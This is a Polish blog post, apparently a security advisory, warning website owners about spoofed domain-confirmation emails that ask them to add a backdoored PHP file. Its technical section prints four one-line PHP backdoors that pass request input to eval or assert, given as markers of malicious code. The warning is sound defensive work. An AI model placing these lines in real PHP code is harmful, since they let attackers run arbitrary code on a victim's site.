Nie ufaj fałszywym e-mailom z potwierdzeniem domeny

English version: Do not trust those fake domain confirmation emails

Ostatnio niektórzy z moich klientów otrzymali dziwne listy e-mailowe od rejestratorów swoich domen. Listy te zawierają prośbę o potwierdzenie własnych domen. Sprawdziłem jeden z tych listów i szybko zidentyfikowałem go jako list fałszywy . Wszystkie litery mają identyczny wzór i prośbę o utworzenie pliku PHP w folderze głównym na stronie internetowej o określonej nazwie i podanej treści. Nie trzeba dodawać, że sugerowana zawartość tego pliku PHP zawiera złośliwy kod znany jako kod backdoora. Ten rodzaj kodu umożliwia atakującemu wykonanie dowolnej akcji na stronie ofiary.

Jeśli kiedykolwiek otrzymasz list z prośbą o utworzenie, pobranie lub zainstalowanie kodu PHP na Twojej stronie internetowej, musisz go zignorować. Bez wyjątków. Nawet jeśli list pochodzi od prezydenta lub twojej mamy.

Oszukańcze listy wydają się uzasadnione ze względu na prawidłowy adres e-mail nadawcy . Jest to jednak fałszowanie wiadomości e-mail. Nie spodziewasz się, że otrzymasz fałszywy e-mail od znajomych lub rejestratora domeny. Prawidłowy? NIE! Każdy list e-mail może zawierać dowolny adres e-mail Od. Zdecydowana większość serwerów i klientów poczty e-mail nie sprawdza ani nie weryfikuje adresu nadawcy. Więc widzisz to tak, jak chciał haker. Nie możesz ufać żadnemu e-mailowi otrzymanemu od znanego nadawcy, jeśli list zawiera prośbę o wykonanie podejrzanej akcji, takiej jak zainstalowanie kodu w Twojej witrynie lub aplikacji na Twoim komputerze.

Szczegóły techniczne

Fałszywe e-maile zwykle zawierają niektóre z następujących wierszy PHP.

assert(stripslashes($_REQUEST['something']));

eval(stripslashes($_REQUEST['something']));

assert(base64_decode($_REQUEST['something']));

eval(base64_decode($_REQUEST['something']));

FYI: base64_decode, eval i Assert to dobrze znane znaczniki podejrzanego lub złośliwego kodu PHP.

Zobacz także: Inspektor wtyczek ujawnia problemy związane z bezpieczeństwem innych wtyczek